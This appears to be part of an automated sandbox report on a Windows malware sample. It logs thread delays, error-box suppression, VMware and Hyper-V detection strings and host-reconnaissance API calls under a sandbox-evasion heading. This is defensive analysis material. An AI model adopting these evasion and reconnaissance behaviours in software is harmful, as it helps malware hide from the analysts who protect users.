Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\hh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeMemory allocated: 28F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeMemory allocated: 48F0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599422Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599313Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599188Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599063Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598703Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598594Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598469Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598348Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598235Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598125Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598013Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597907Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597782Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597407Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597282Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597157Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597047Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596688Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596563Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596438Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596327Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596208Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596052Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595703Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595594Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595484Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595368Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595220Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595094Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594983Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594874Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594766Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594407Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594282Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594157Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeWindow / User API: threadDelayed 7297Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeWindow / User API: threadDelayed 2424Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 3385Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 2707Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 3289Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 745Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 704Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeDropped PE file which has not been started: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.rawJump to dropped file
Source: C:\Windows\hh.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeAPI coverage: 0.6 %
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeAPI coverage: 4.7 %
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeAPI coverage: 0.5 %
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeAPI coverage: 0.5 %
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -30437127721620741s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599875s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599657s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599532s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599422s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599313s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599188s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599063s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598938s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598813s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598703s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598594s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598469s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598348s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598235s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598125s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598013s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597907s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597782s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597657s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597532s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597407s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597282s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597157s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597047s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596938s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596813s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596688s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596563s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596438s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596327s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596208s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596052s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595938s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595813s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595703s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595594s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595484s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595368s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595220s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595094s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594983s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594874s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594657s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594532s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594407s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594282s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594157s >= -30000sJump to behavior
Source: C:\Windows\hh.exe TID: 4416Thread sleep count: 3385 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 4416Thread sleep time: -3385000s >= -30000sJump to behavior
Source: C:\Windows\hh.exe TID: 516Thread sleep count: 2707 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 4416Thread sleep count: 3289 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 4416Thread sleep time: -3289000s >= -30000sJump to behavior
Source: C:\Windows\hh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\hh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\hh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90F0E70 FindFirstFileExW,FindClose,wcscpy_s,5_2_00007FF8B90F0E70
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8FF350 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,7_2_000001CDCB8FF350
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9360E70 FindFirstFileExW,FindClose,wcscpy_s,26_2_00007FF8A9360E70
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8010E70 FindFirstFileExW,FindClose,wcscpy_s,28_2_00007FF8A8010E70
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,7_2_000001CDCB8F6370
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,7_2_000001CDCB8F6370
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599422Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599313Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599188Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599063Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598703Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598594Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598469Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598348Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598235Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598125Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598013Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597907Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597782Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597407Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597282Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597157Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597047Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596688Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596563Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596438Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596327Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596208Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596052Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595703Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595594Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595484Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595368Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595220Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595094Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594983Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594874Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594766Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594407Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594282Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594157Jump to behavior
Source: Amcache.hve.10.drBinary or memory string: VMware
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
Source: explorer.exe, 0000000B.00000002.2589830986.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 0000000E.00000003.2711021936.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000B.00000000.2551388655.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 0000000E.00000003.3867808677.0000000008CB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
